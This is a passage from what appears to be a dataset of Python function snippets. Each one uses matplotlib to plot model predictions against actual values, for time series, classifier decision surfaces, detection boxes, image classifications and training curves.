val_data[outputs].to_numpy().T\n\n\n # Use the model to predict the output-signals.\n mdl = np.load(model)\n \n # The output of the model\n xid, yid = fsetSIM.SS_lsim_innovation_form(A=mdl['A'], B=mdl['B'], C=mdl['C'], D=mdl['D'], K=mdl['K'], y=y, u=u, x0=mdl['X0'])\n \n # Make the plotting-canvas bigger.\n plt.rcParams['figure.figsize'] = [25, 5]\n # For each output-signal.\n for idx in range(0,len(outputs)):\n plt.figure(idx)\n plt.xticks(rotation=15)\n plt.plot(Time, y[idx],color='r')\n plt.plot(Time, yid[idx],color='b')\n plt.ylabel(outputs[idx])\n plt.grid()\n plt.xlabel(\"Time\")\n plt.title('output_'+ str(idx+1))\n plt.legend(['measurment', 'prediction'])\n ax=plt.gca()\n xfmt = md.DateFormatter('%m-%d-%yy %H:%M')\n ax.xaxis.set_major_formatter(xfmt) \n if scale_plt==True:\n plt.ylim(np.amin(y[idx])*.99, np.amax(y[idx])*1.01)\n \n if plt_input == True:\n for idx in range(len(outputs), len(outputs) + len(inputs)):\n plt.figure(idx)\n plt.xticks(rotation=15)\n plt.plot(Time, u[idx-len(outputs)], color='r')\n plt.ylabel(inputs[idx-len(outputs)])\n plt.grid()\n plt.xlabel(\"Time\")\n plt.title('input_'+ str(idx-len(outputs)+1))\n ax=plt.gca()\n xfmt = md.DateFormatter('%m-%d-%yy %H:%M')\n ax.xaxis.set_major_formatter(xfmt) \n plt.show()", "def plot_prediction(test_YY, predict_age_month):\n\n\t# PLot-actual vs predicted age from test image\n\tfig, ax = plt.subplots(figsize = (7,7))\n\n\tplt.plot(test_YY, predict_age_month, 'ro')\n\n\tax.plot(test_YY, predict_age_month, 'r.',\n\t\t\t\t\tlabel = 'predictions (xception)-test image')\n\n\tax.plot(test_YY, test_YY, 'b-',\n\t\t\t\t\t\t\t\tlabel = 'actual-test image')\n\n\tax.legend(loc = 'upper right')\n\tax.set_xlabel('Actual Age (Months)')\n\tax.set_ylabel('Predicted Age (Months)')\n\tplt.show()", "def plot_scatter(self):\n if Trainer.y_pred is None or Trainer.y_true is None:\n messagebox.showerror(\"Information\", \"Please train the model first before plotting\")\n return\n\n fig = plt.figure(figsize=(8, 4))\n plt.xlabel(\"Prediction\")\n plt.ylabel(\"Target\")\n plt.figtext(0, 0, f\"RMSE: {self.test_rmse}\", fontsize=13)\n plt.grid()\n plt.scatter(x=Trainer.y_true, y=Trainer.y_pred, c='b', s=1)\n\n win = tk.Toplevel()\n win.wm_title(\"Window\")\n win.geometry(\"1000x500\")\n\n # specify the window as master\n canvas = FigureCanvasTkAgg(fig, master=win)\n canvas.draw()\n canvas.get_tk_widget().grid(row=0, column=0, sticky=tk.W)\n\n # navigation toolbar\n toolbarFrame = tk.Frame(master=win)\n toolbarFrame.grid(row=1, column=0)\n toolbar = NavigationToolbar2Tk(canvas, toolbarFrame)", "def plot(self):\r\n \r\n\r\n print(\"Printing decision surfaces of decision trees\")\r\n plot_colors = \"rb\"\r\n plot_step = 0.02\r\n n_classes = 2\r\n for _ in range (self.n_estimators):\r\n plt.subplot(2, 3, _ + 1)\r\n x_min, x_max = self.X.iloc[:, 0].min() - 1, self.X.iloc[:, 0].max() + 1\r\n y_min, y_max = self.X.iloc[:, 1].min() - 1, self.X.iloc[:, 1].max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),np.arange(y_min, y_max, plot_step))\r\n plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)\r\n Z = self.clfs[_].predict(np.c_[xx.ravel(), yy.ravel()])\r\n Z = np.array(Z)\r\n Z = Z.reshape(xx.shape)\r\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdBu)\r\n for i, color in zip(range(n_classes), plot_colors):\r\n if i == 0:\r\n idx = np.where(self.y == -1)\r\n if i == 1:\r\n idx = np.where(self.y == 1)\r\n for i in range (len(idx[0])):\r\n plt.scatter(self.X.loc[idx[0][i]][0], self.X.loc[idx[0][i]][1],c=color,cmap=plt.cm.RdBu, edgecolor='black', s=15)\r\n plt.suptitle(\"Decision surface of a decision tree using paired features\")\r\n plt.legend(loc='lower right', borderpad=0, handletextpad=0)\r\n plt.axis(\"tight\")\r\n\r\n plt.show()\r\n fig1 = plt\r\n\r\n # Figure 2\r\n print(\"Printing decision surface by combining the individual estimators\")\r\n plot_colors = \"rb\"\r\n plot_step = 0.02\r\n n_classes = 2\r\n x_min, x_max = self.X.iloc[:, 0].min() - 1, self.X.iloc[:, 0].max() + 1\r\n y_min, y_max = self.X.iloc[:, 1].min() - 1, self.X.iloc[:, 1].max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),np.arange(y_min, y_max, plot_step))\r\n plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)\r\n Z = config.Classifier_AB.predict(np.c_[xx.ravel(), yy.ravel()])\r\n Z = np.array(Z)\r\n Z = Z.reshape(xx.shape)\r\n cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdBu)\r\n for i, color in zip(range(n_classes), plot_colors):\r\n if i == 0:\r\n idx = np.where(self.y == -1)\r\n if i == 1:\r\n idx = np.where(self.y == 1)\r\n for i in range (len(idx[0])):\r\n plt.scatter(self.X.loc[idx[0][i]][0], self.X.loc[idx[0][i]][1],c=color,cmap=plt.cm.RdBu, edgecolor='black', s=15)\r\n plt.suptitle(\"Decision surface by combining individual estimators\")\r\n plt.legend(loc='lower right', borderpad=0, handletextpad=0)\r\n plt.axis(\"tight\")\r\n\r\n plt.show()\r\n fig2 = plt\r\n\r\n return [fig1,fig2]", "def plot_results(actual_time_series, predicted_values, len_train_data,\n y_name='Parameter'):\n\n plt.plot(np.arange(0, len(actual_time_series)),\n actual_time_series, label='Actual values', c='green')\n plt.plot(np.arange(len_train_data, len_train_data + len(predicted_values)),\n predicted_values, label='Predicted', c='blue')\n # Plot black line which divide our array into train and test\n plt.plot([len_train_data, len_train_data],\n [min(actual_time_series), max(actual_time_series)], c='black',\n linewidth=1)\n plt.ylabel(y_name, fontsize=15)\n plt.xlabel('Time index', fontsize=15)\n plt.legend(fontsize=15)\n plt.grid()\n plt.show()", "def draw_pred_gt_boxes(image_outname, img, boxes, labels, scores, image_name=None, figsize=(15,15)):\n fig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=figsize)\n if image_name is not None:\n fig.suptitle(image_name)\n if isinstance(img, torch.Tensor):\n img = img.numpy().squeeze().transpose((1,2,0))\n # Display the image\n ax1.imshow(img)\n ax2.imshow(img)\n \n ax1.set_title('Prediction')\n ax2.set_title('Ground Truth')\n\n # Split prediction and ground truth\n pred_boxes, pred_labels, pred_scores = boxes[0], labels[0], scores\n gt_boxes, gt_labels = boxes[1], labels[1]\n\n # Plot prediction boxes\n for box, label, score in zip(pred_boxes, pred_labels, pred_scores):\n label = int(label)\n color = STANDARD_COLORS[label]\n x,y,w,h = box\n rect = patches.Rectangle((x,y),w,h,linewidth=1.5,edgecolor = color,facecolor='none')\n score = np.round(score, 3)\n text = '{}: {}'.format(label, str(score))\n ax1.text(x, y-3,text, color = color, fontsize=15)\n # Add the patch to the Axes\n ax1.add_patch(rect)\n\n # Plot ground truth boxes\n for box, label in zip(gt_boxes, gt_labels):\n label = int(label)\n if label <0:\n continue\n color = STANDARD_COLORS[label]\n x,y,w,h = box\n rect = patches.Rectangle((x,y),w,h,linewidth=1.5,edgecolor = color,facecolor='none')\n score = np.round(score, 3)\n text = '{}'.format(label)\n ax2.text(x, y-3,text, color = color, fontsize=15)\n # Add the patch to the Axes\n ax2.add_patch(rect)\n\n plt.axis('off')\n plt.savefig(image_outname,bbox_inches='tight')\n plt.close()", "def plot_all(m, d, m_est, d_pred, equalize=True):\n fig = plt.figure(figsize=(10,6))\n\n ax0 = fig.add_subplot(2,2,1)\n ax0.plot(m)\n t = \"$\\mathrm{{Model}}\\ m.\\ \\mathrm{{norm}}\\ {:.3f}$\"\n ax0.set_title(t.format(norm(m)))\n ax0_mi, ax0_ma = ax0.get_ylim()\n\n ax1 = fig.add_subplot(2,2,2)\n ax1.plot(d, 'o', mew=0)\n ax1.set_title(\"$\\mathrm{Data}\\ d$\")\n ax1_mi, ax1_ma = ax1.get_ylim()\n\n ax2 = fig.add_subplot(2,2,3)\n ax2.plot(m, alpha=0.25)\n ax2.plot(m_est)\n t = \"$\\mathrm{{Estimated\\ model}}\\ m_\\mathrm{{est}}.\\ \\mathrm{{norm}}\\ {:.3f}$\"\n ax2.set_title(t.format(norm(m_est)))\n ax2_mi, ax2_ma = ax2.get_ylim()\n\n ax3 = fig.add_subplot(2,2,4)\n ax3.plot(d, 'o', mew=0, alpha=0.25)\n ax3.plot(d_pred, 'o', mew=0)\n t = \"$\\mathrm{{Predicted\\ data}}\\ d_\\mathrm{{pred}}.\\ \\mathrm{{misfit}}\\ {:.3f}$\"\n ax3.set_title(t.format(misfit(d, d_pred)))\n ax3_mi, ax3_ma = ax3.get_ylim()\n\n if equalize:\n ax0.set_ylim(min(ax0_mi, ax2_mi) - 0.1,\n max(ax0_ma, ax2_ma) + 0.1)\n\n ax2.set_ylim(min(ax0_mi, ax2_mi) - 0.1,\n max(ax0_ma, ax2_ma) + 0.1)\n\n ax1.set_ylim(min(ax1_mi, ax3_mi) - 0.1,\n max(ax1_ma, ax3_ma) + 0.1)\n\n ax3.set_ylim(min(ax1_mi, ax3_mi) - 0.1,\n max(ax1_ma, ax3_ma) + 0.1)\n\n plt.show()", "def actual_pred_plot(preds):\r\n actual_pred = pd.DataFrame(columns=['Cost', 'prediction'])\r\n actual_pred['Cost'] = all_data['2020':].iloc[:, -1][1:len(preds) + 1]\r\n actual_pred['prediction'] = preds[:, -1]\r\n\r\n from keras.metrics import MeanSquaredError\r\n m = MeanSquaredError()\r\n m.update_state(np.array(actual_pred['Cost']), np.array(actual_pred['prediction']))\r\n\r\n return m.result().numpy(), actual_pred.plot()", "def evaluate(y_train,train_preds,y_test,test_preds,model,features):\n \n plt.figure(figsize=(3.5,3))\n train_mae = np.abs(y_train-train_preds).mean()\n test_mae = np.abs(y_test-test_preds).mean()\n print(model, split)\n print('Test MAE: %4.2f'%(test_mae))\n print('Train MAE: %4.2f'%(train_mae))\n plt.plot(y_train,train_preds,'.',c='grey',ms=3,label='Train MAE: %4.2f'%train_mae,alpha=1)\n plt.plot(y_test,test_preds,'.',c=colors[model],ms=3,label='Test MAE: %4.2f'%test_mae,alpha=1)\n #plt.title('%s: Train MAE = %.2f eV; Test MAE = %.2f eV'%(model,np.abs(y_train-train_preds).mean(),np.abs(y_test-test_preds).mean()),fontsize=10)\n\n xlim = plt.gca().get_xlim()\n ylim = plt.gca().get_ylim()\n \n alim = (min(xlim[0],ylim[0]),max(xlim[1],ylim[1]))\n\n plt.plot(alim,alim,'-k',lw=1)\n plt.gca().set_ylim(alim)\n plt.gca().set_xlim(alim)\n\n plt.xlabel('$\\Delta E$ (eV)')\n plt.ylabel('$\\Delta E$ Predicted (eV)')\n\n plt.legend(loc='best')\n\n plt.tight_layout()\n plt.savefig('./parity/'+model+'_'+features+'_'+split+'_parity.pdf')\n \n #Functionality to plot histogram of error if desired\n\n #plt.figure()\n #plt.hist(preds-y,bins=100)\n #plt.xlabel('$\\hat{y} - y$ (eV)')\n #plt.title('%s %s: MAE = %.2f eV'%(model,tt,np.abs(y-preds).mean()))\n\n #xlim = np.array(plt.gca().get_xlim())\n #xmax = np.abs(xlim).max()\n #plt.gca().set_xlim([-xmax,xmax])\n\n #plt.savefig('./output/'+model+'_'+features+'_'+split+'_'+tt+'_hist.pdf')\n\n return", "def plot_results(self):\n\n\n f1, ax1 = plt.subplots()\n h1, = ax1.plot(self.history[\"step\"], self.history[\"trainLoss\"],\\\n \"b-\", label=\"Loss - Train\")\n h2, = ax1.plot(self.history[\"step\"], self.history[\"validLoss\"],\\\n \"b.\", label=\"Loss - Validation\")\n\n ax1.set_ylabel(\"Loss\", color = \"blue\")\n ax1.tick_params(\"y\", color = \"blue\")\n ax1.yaxis.label.set_color(\"blue\")\n ax1.set_xlabel(\"Training Steps [{}]\".format(self.FLAGS.eval_every))\n\n ax2 = ax1.twinx()\n h3, = ax2.plot(self.history[\"step\"], self.history[\"trainAccr\"], \"r-\",\\\n label = \"Accuracy - Train\")\n h4, = ax2.plot(self.history[\"step\"], self.history[\"validAccr\"], \"r.\",\\\n label = \"Accuracy - Validation\")\n\n ax2.set_ylabel(\"Accuracy\", color = \"red\")\n ax2.tick_params(\"y\", color = \"red\")\n ax2.yaxis.label.set_color(\"red\")\n\n hds = [h1,h2,h3,h4]\n lbs = [l.get_label() for l in hds]\n ax1.legend(hds, lbs)\n f1.tight_layout()\n plt.savefig(\"trainingHistory.png\")\n\n plt.close(f1)\n #plt.show()", "def plot_preds(axes: np.ndarray, y_true: np.ndarray, y_pred: np.ndarray, n_agents: int,\n n_options: int) -> None:\n n = y_true.shape[0]\n\n n_timesteps = int(y_true.size / (n * n_agents * n_options))\n y_true = np.reshape(y_true, (n, n_timesteps, n_agents, n_options))\n y_pred = np.reshape(y_pred, (n, n_timesteps, n_agents, n_options))\n\n for i in range(n):\n for option in range(n_options):\n ax = axes[i * 2 + option, 0]\n for agent in range(n_agents):\n ax.plot(y_true[i][:, agent, option], label=str(agent))\n for option in range(n_options):\n ax = axes[i * 2 + option, 1]\n for agent in range(n_agents):\n ax.plot(y_pred[i][:, agent, option], label=str(agent))", "def plot_results(sgd_train_acc, sgd_train_std, sgd_heldout_acc, sgd_heldout_std, sgd_test_acc,\n dt_train_acc, dt_train_std, dt_heldout_acc, dt_heldout_std, dt_test_acc,\n dt4_train_acc, dt4_train_std, dt4_heldout_acc, dt4_heldout_std, dt4_test_acc,\n stumps_train_acc, stumps_train_std, stumps_heldout_acc, stumps_heldout_std, stumps_test_acc):\n train_x_pos = [0, 4, 8, 12]\n cv_x_pos = [1, 5, 9, 13]\n test_x_pos = [2, 6, 10, 14]\n ticks = cv_x_pos\n\n labels = ['sgd', 'dt', 'dt4', 'stumps (4 x 50)']\n\n train_accs = [sgd_train_acc, dt_train_acc, dt4_train_acc, stumps_train_acc]\n train_errors = [sgd_train_std, dt_train_std, dt4_train_std, stumps_train_std]\n\n cv_accs = [sgd_heldout_acc, dt_heldout_acc, dt4_heldout_acc, stumps_heldout_acc]\n cv_errors = [sgd_heldout_std, dt_heldout_std, dt4_heldout_std, stumps_heldout_std]\n\n test_accs = [sgd_test_acc, dt_test_acc, dt4_test_acc, stumps_test_acc]\n\n fig, ax = plt.subplots()\n ax.bar(train_x_pos, train_accs, yerr=train_errors, align='center', alpha=0.5, ecolor='black', capsize=10, label='train')\n ax.bar(cv_x_pos, cv_accs, yerr=cv_errors, align='center', alpha=0.5, ecolor='black', capsize=10, label='held-out')\n ax.bar(test_x_pos, test_accs, align='center', alpha=0.5, capsize=10, label='test')\n ax.set_ylabel('Accuracy')\n ax.set_xticks(ticks)\n ax.set_xticklabels(labels)\n ax.set_title('Models')\n ax.yaxis.grid(True)\n ax.legend()\n plt.tight_layout()", "def visualize_data(y_test, x_test, window_out, num_plots, num_win_ser, cols_y, col_idx):\n \n \n ser_idx = [i for i in range(0, len(y_test), num_win_ser)]\n if num_plots > len(ser_idx):\n print(\"Too many plots, reduce the mumber\")\n else:\n indx = ser_idx[0:num_plots]\n days = range(num_win_ser)\n for idx in indx:\n CR = x_test[idx][0][3]\n #pred = y_pred[idx : idx+num_win_ser, window_out -1, col_idx]\n true = y_test[idx : idx+num_win_ser, window_out -1, col_idx]\n \n plt.title(\"Y_True, CR: \"+ str(CR))\n plt.xlabel('Days')\n plt.ylabel(cols_y[col_idx])\n \n #plt.plot(days, pred, label = 'Pred')\n plt.plot(days, true, label = 'True')\n \n plt.legend()\n plt.show()", "def prediction_plotter(X_Test, gp):\r\n newX = X_Test[:, None]\r\n predictions_array = np.zeros((3,2,np.shape(X_Test)[0]))\r\n\r\n for i in [-1, 0, 1]:\r\n each_axis_test = np.hstack([newX,np.ones_like(newX)+i])\r\n predictions_array[i, :,:] = np.squeeze(gp.predict(each_axis_test, include_likelihood=False))\r\n predictions_array = predictions_array[:,0,:]\r\n\r\n corrected_predictions = np.zeros((3, np.shape(X_Test)[0]))\r\n corrected_predictions[0,:] = predictions_array[2,:]\r\n corrected_predictions[1, :] = predictions_array[0, :]\r\n corrected_predictions[2, :] = predictions_array[1, :]\r\n\r\n trajectory_plotter(corrected_predictions[None, :, :])\r\n return predictions_array", "def test_exercise_2():\n dirname = os.path.dirname(os.path.realpath(__file__))\n df = pd.read_pickle(f\"{dirname}/material/data-consumption-function.pkl\")\n\n def construct_predicted_values(income, alpha, beta, gamma):\n return alpha + beta * income ** gamma\n\n mock_rslt = [-91.1933, 0.5691, 1.0204]\n income = df[\"realgdp\"].values\n df[\"realcons_pred\"] = construct_predicted_values(income, *mock_rslt)\n\n x = df.index.get_level_values(\"Year\")\n fig, ax = plt.subplots()\n ax.plot(x, df[\"realcons_pred\"], label=\"Predicted\")\n ax.plot(x, df[\"realcons\"], label=\"Observed\")", "def compare_plots(data_list, title_list, perp_list = [5, 30, 100], step_list = [10, 50, 1000], \\\n perp_plot = True, step_plot_perp = 30, verbose = False, plot_3d = False, \\\n cdict = {1: 'red', 2: 'mediumspringgreen', 3: 'royalblue'}, df = 1):\n \n # Determine dimensions of plot grid\n nrows = len(perp_list) + 1\n ncols = len(data_list)\n \n # Configure axes\n axes = []\n fig = plt.figure(figsize = (16, 3 * nrows))\n \n # Generate plots of starting points (first two columns for high-dimensional)\n for index, dat in enumerate(data_list):\n X, labs = dat\n \n # Check whether original data should be plotted in 3D, and adjust axes accordingly\n if plot_3d:\n axes.append(fig.add_subplot(nrows, ncols, 1 + index, projection = '3d'))\n axes[-1].scatter(xs = X[:, 0], ys = X[:, 1], zs = X[:, 2], edgecolor = None, alpha = 0.8, \\\n c = np.array(list(map(lambda x: cdict[x], labs))))\n axes[-1].set_axis_off()\n else:\n axes.append(fig.add_subplot(nrows, ncols, 1 + index))\n plt.scatter(x = X[:, 0], y = X[:, 1], edgecolor = None, alpha = 0.8, \\\n c = np.array(list(map(lambda x: cdict[x], labs))))\n axes[-1].set_xticklabels([])\n axes[-1].set_yticklabels([])\n axes[-1].xaxis.set_ticks_position('none')\n axes[-1].yaxis.set_ticks_position('none')\n axes[-1].set_title(\"\\n\".join(wrap(title_list[index], 35))) \n \n # Based on function input, generate either perplexity plots of interim iteration plots\n if perp_plot:\n # Generate plots of t-SNE output for different perplexities\n for perp in range(len(perp_list)):\n low_d = tsne(X = X, perplexity = perp_list[perp], verbose = verbose, optim = \"fastest\", df = df)\n axes.append(fig.add_subplot(nrows, ncols, 1 + index + (perp + 1) * ncols))\n axes[-1].set_title(\"Perplexity = \" + str(perp_list[perp]))\n plt.scatter(x = low_d[-1, :, 0], y = low_d[-1, :, 1], edgecolor = None, alpha = 0.8, \\\n c = np.array(list(map(lambda x: cdict[x], labs))))\n axes[-1].set_xticklabels([])\n axes[-1].set_yticklabels([])\n axes[-1].xaxis.set_ticks_position('none')\n axes[-1].yaxis.set_ticks_position('none')\n else:\n # Generate plots of t-SNE output for different iterations\n low_d = tsne(X = X, perplexity = step_plot_perp, niter = np.max(step_list), verbose = verbose, optim = \"fastest\", \\\n df = df)\n for step in range(len(step_list)):\n axes.append(fig.add_subplot(nrows, ncols, 1 + index + (step + 1) * ncols))\n axes[-1].set_title(\"Perplexity = \" + str(step_plot_perp) + \", Step = \" + str(step_list[step]))\n plt.scatter(x = low_d[step_list[step], :, 0], y = low_d[step_list[step], :, 1], \\\n edgecolor = None, alpha = 0.8,\\\n c = np.array(list(map(lambda x: cdict[x], labs))))\n axes[-1].set_xticklabels([])\n axes[-1].set_yticklabels([])\n axes[-1].xaxis.set_ticks_position('none')\n axes[-1].yaxis.set_ticks_position('none')", "def plot_results(y_trues, y_preds, marker='o', ms=5, fillstyle=None,\n linestyle='None', output_file=None):\n n_folds = len(y_trues)\n plt.figure(figsize=(6, 6 * n_folds))\n\n for i, (y_true, y_pred) in enumerate(zip(y_trues, y_preds)):\n\n plt.subplot(n_folds, 1, i + 1)\n\n # Plot each point\n plt.plot(y_true, y_pred, marker=marker, ms=ms,\n fillstyle=fillstyle, linestyle=linestyle, color='C0')\n\n # Plot the perfect line\n min_age = np.min(np.r_[y_true, y_pred])\n max_age = np.max(np.r_[y_true, y_pred])\n plt.plot([min_age, max_age], [min_age, max_age], color='C1')\n\n # Compute the MAE\n mae = mean_absolute_error(y_true, y_pred)\n r, _ = spearmanr(y_true, np.abs(y_true - y_pred))\n\n # Add a title\n plt.title(\"Fold {0}\\nMAE={1:0.3f} - r={2:0.3f}\"\n .format(i + 1, mae, r), fontsize=16)\n plt.xlabel(\"True age\", fontsize=12)\n plt.ylabel(\"Predicted age\", fontsize=12)\n\n plt.subplots_adjust(hspace=0.45)\n\n if output_file is not None:\n plt.savefig(output_file)\n\n plt.show()", "def plot_predictions(y, yhat, title=\"Predictions vs Actual\", output_dir=None):\n\n fig = plt.figure(figsize=(15, 6))\n plt.xlabel('Time')\n plt.ylabel('PM10')\n plt.plot(y, label=\"actual\", figure=fig)\n plt.plot(yhat, label=\"predicted\", figure=fig)\n plt.title(title)\n fig.legend()\n\n if output_dir != None:\n plt.savefig(os.path.join(output_dir, \"{}.png\".format(title)))\n\n plt.close(fig)", "def plot_heldout_prediction(input_val,\n y_val,\n mu_val,\n sigma_val,\n fname=None,\n n=1,\n title=\"\"):\n fig = figure.Figure(figsize=(9, 3 * n))\n canvas = backend_agg.FigureCanvasAgg(fig)\n for i in range(n):\n ax = fig.add_subplot(n, i + 1, 1)\n ax.plot(input_val, y_val, label='True data')\n ax.plot(input_val, mu_val, label='Predictive mean')\n lower = mu_val - 1.96 * sigma_val\n upper = mu_val + 1.96 * sigma_val\n ax.fill_between(\n input_val, lower, upper, label='95% confidence interval')\n\n plt.legend()\n fig.suptitle(title)\n fig.tight_layout()\n\n if fname is not None:\n canvas.print_figure(fname, format=\"png\")\n print(\"saved {}\".format(fname))", "def visualize_predictions(self, images, preds, targets):\n\n class_names = ['angry', 'happy', 'sad']\n images = images[:8]\n preds = preds[:8]\n targets = targets[:8]\n\n # determine size of the grid based for the given batch size\n num_rows = int(torch.tensor(len(images)).float().sqrt().floor())\n\n fig = plt.figure(figsize=(7, 7))\n for i in range(len(images)):\n plt.subplot(num_rows, len(images) // num_rows + 1, i+1)\n img = images[i].permute(1, 2, 0).cpu().numpy()\n img = np.array([0.229, 0.224, 0.225]) * img + np.array([0.485, 0.456, 0.406])\n img = np.clip(img, 0, 1)\n plt.imshow(img)\n plt.title(f'pred: {class_names[preds[i]]}'\n f'\\ntruth: [{class_names[targets[i]]}]')\n plt.axis('off')\n\n self.logger.experiment.add_figure(\n 'predictions', fig, global_step=self.global_step)", "def Plot_predict(X,Y,model,X_path): \n labels = {0: 'CNV', 1: 'DME', 2: 'DRUSEN', 3: 'NORMAL'}\n Y_pred_classes = np.argmax(model.predict(X),axis = 1) \n Y_true = np.argmax(Y,axis = 1)\n \n fig = plt.figure(figsize=(40, 40)) \n for i in range(X.shape[0]):\n ax = fig.add_subplot(8, 4, i + 1, xticks=[], yticks=[])\n ax.set_title(\"Groundtruth : {} \\n Prediction : {}\".format(labels[Y_true[i]],labels[Y_pred_classes[i]]), \\\n color=(\"green\" if Y_true[i] == Y_pred_classes[i] else \"red\"),fontsize=20) \n img = image.load_img(X_path[i])\n ax.imshow(img)\n plt.show()\n return", "def cross_validation_visualization(lambds, score_tr, score_te):\n plt.semilogx(lambds, score_tr, marker=\".\", color='b', label='train score');\n plt.semilogx(lambds, score_te, marker=\".\", color='r', label='test score');\n plt.xlabel(\"lambda\")\n plt.ylabel(\"score\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n plt.savefig(\"cross_validation_test\")", "def standard_visual(pred_data_path: str, input_data_path: str):\n nb_rows = 1 if pred_dataset == 'test' else 2\n\n prediction = sitk.GetArrayFromImage(sitk.ReadImage(pred_data_path))\n input_images, ground_truth = get_input(patient_id, input_data_path)\n prediction_masked = np.ma.masked_where(prediction == 0, prediction)\n\n for i in range(prediction.shape[0]):\n fig = plt.figure(figsize=(15, 7.5))\n fig.suptitle('{}: Slice {}'.format(patient_id, i))\n\n plt.subplot(nb_rows, 1, 1)\n plt.title('Prediction')\n plt.imshow(input_images[i, ...], 'gray', interpolation=None)\n plt.imshow(prediction_masked[i, ...], 'jet', vmin=0, vmax=3, interpolation='none', alpha=0.4)\n\n if nb_rows == 2:\n plt.subplot(nb_rows, 1, 2)\n plt.title('Ground Truth')\n plt.imshow(input_images[i, ...], 'gray', interpolation=None)\n plt.imshow(ground_truth[i, ...], 'jet', vmin=0, vmax=3, interpolation='none', alpha=0.4)\n\n plt.show(block=True)", "def plot_2d(X, y_actual, y_predicted=None):\n if not y_predicted is None:\n plt.title(\"Predicted vs actual function values\")\n else:\n plt.title(\"Approximated function samples\")\n\n plt.plot(X, y_actual, 'g.', label=\"Actual values\")\n if not y_predicted is None:\n plt.plot(X, y_predicted, 'b.', label=\"Predicted values\")\n plt.show()", "def display_predictions(data, predictions):\n images = [[] for i in range(5)]\n for i, pred in enumerate(predictions):\n images[pred].append(data[i])\n cols = ['Ne', 'Mo', 'Ba', 'Eo', 'Ly']\n lengths = [len(w) for w in images]\n fig = plt.figure()\n grid = ImageGrid(fig, 111, nrows_ncols=(5, len(cols)), axes_pad=0.1,)\n for i, image_type in enumerate(images):\n for j, image in enumerate(image_type):\n if j >= 5:\n break\n grid[(len(images)*j)+i].imshow(image)\n\n pad = 5 # in points\n for ax, col in zip(grid.axes_all, cols):\n ax.annotate(col, xy=(0.5, 1), xytext=(0, pad), xycoords='axes fraction', textcoords='offset points', size='large',\n ha='center', va='baseline')\n fig.tight_layout()\n fig.subplots_adjust(left=0.15, top=0.95)\n plt.show()", "def draw_predictions(self):\n self.vis.draw_predictions()", "def display_predictions(self, x, pred, y):\r\n fig = plt.figure(figsize=(15, 15))\r\n\r\n for i in range(self.batch_size):\r\n vals = x[i, :, :, :]\r\n sub = fig.add_subplot(1, self.batch_size, i + 1)\r\n val = pred[i]\r\n val2 = y[i]\r\n res = self.classes[val]\r\n res2 = self.classes[val2]\r\n\r\n sub.set_title(\"predicted = \" + res + \"\\n\" + \"Actual = \" + res2)\r\n plt.axis('off')\r\n img = np.asarray(vals)\r\n img = np.transpose(img, (1, 2, 0))\r\n # Get Specific channels for rgb\r\n rgbimg = self.get_rgb(img, 61, 38, 19)\r\n\r\n # Normalize Inputs\r\n imgmin, imgmax = rgbimg.min(), rgbimg.max()\r\n rgbimg = (rgbimg - imgmin) / (imgmax - imgmin)\r\n plt.imshow(rgbimg)\r\n file_loc = [str(self.training_path) + '\\\\checkpoints' +\r\n '\\\\' + 'predictions.jpg']\r\n s = \"\"\r\n s = s.join(file_loc)\r\n pred_path = Path(s)\r\n plt.savefig(pred_path)\r\n plt.show()", "def plot(model, samples):\n # compute responsiblity values\n resp = model.predict_proba(samples)\n\n # plot\n plt.axis('equal')\n plt.scatter(samples[:,0], samples[:,1], c=resp)\n plt.show()", "def plotModelResults(model, X_train=X_train, X_test=X_test, plot_intervals=False, plot_anomalies=False):\n\n prediction = model.predict(X_test)\n\n plt.figure(figsize=(15, 7))\n\n plt.plot(prediction, \"g\", label=\"prediction\", linewidth=2.0)\n plt.plot(y_test.values, label=\"actual\", linewidth=2.0)\n plt.draw()\n if plot_intervals:\n cv = cross_val_score(model, X_train, y_train,\n cv=tscv,\n scoring=\"neg_mean_absolute_error\")\n mae = cv.mean() * (-1)\n deviation = cv.std()\n\n scale = 1.96\n lower = prediction - (mae + scale * deviation)\n upper = prediction + (mae + scale * deviation)\n\n plt.plot(lower, \"r--\", label=\"upper bond / lower bond\", alpha=0.5)\n plt.plot(upper, \"r--\", alpha=0.5)\n plt.draw()\n\n if plot_anomalies:\n anomalies = np.array([np.NaN]*len(y_test))\n anomalies[y_test<lower] = y_test[y_test<lower]\n anomalies[y_test>upper] = y_test[y_test>upper]\n plt.plot(anomalies, \"o\", markersize=10, label = \"Anomalies\")\n plt.draw()\n def mean_absolute_percentage_error(y_true, y_pred):\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\n error = mean_absolute_percentage_error(prediction, y_test)\n plt.title(\"Mean absolute percentage error {0:.2f}%\".format(error))\n plt.legend(loc=\"best\")\n plt.tight_layout()\n plt.grid(True)\n plt.draw()", "def plot_policy_diff(predicted, true, walls, fig, ax):\n from matplotlib.patches import Rectangle\n\n plot_policy(walls, predicted, fig, ax)\n\n predicted = np.argmax(predicted, axis=-1)\n true = np.argmax(true, axis=-1)\n\n for i in range(len(predicted)):\n for j in range(len(predicted)):\n if predicted[i, j] != true[i, j]:\n ax.add_patch(\n Rectangle(\n (j - 0.5, i - 0.5),\n 1,\n 1,\n fill=False,\n edgecolor=\"red\",\n linewidth=1.5,\n )\n )", "def visualize(self, time, pred, true):\n plt.plot(time, true, label='Actual')\n plt.plot(time, pred, label='Predicted')\n plt.xlabel('Time')\n plt.ylabel('Price ($)')\n plt.legend(bbox_to_anchor=(0.1, 1), loc=2, borderaxespad=0.,\n prop={'size': 14})\n plt.show()", "def _plot_good_pred_whit_reject(self, test: Set, title=None, fig_size=None):\r\n if fig_size is not None:\r\n fig = plt.figure(figsize=fig_size)\r\n else:\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n goodclassified_index = []\r\n for idx_preds in range(self.preds.shape[1] - 1):\r\n new_good_index = []\r\n for idx in range(self.preds.shape[0]):\r\n if self.preds[idx][0][idx_preds] == test.labels[idx] and \\\r\n self.preds[idx][1][idx_preds] != self.preds[idx][1][idx_preds + 1]:\r\n new_good_index.append(idx)\r\n if 